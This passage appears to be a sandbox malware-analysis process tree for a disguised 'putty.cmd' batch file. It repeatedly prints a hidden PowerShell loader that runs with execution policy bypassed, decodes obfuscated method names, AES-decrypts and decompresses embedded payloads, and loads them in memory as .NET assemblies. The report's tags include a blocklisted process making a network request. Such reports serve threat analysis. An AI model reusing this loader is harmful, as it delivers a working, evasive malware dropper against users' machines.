C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"2⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"2⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"2⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd4⤵
-
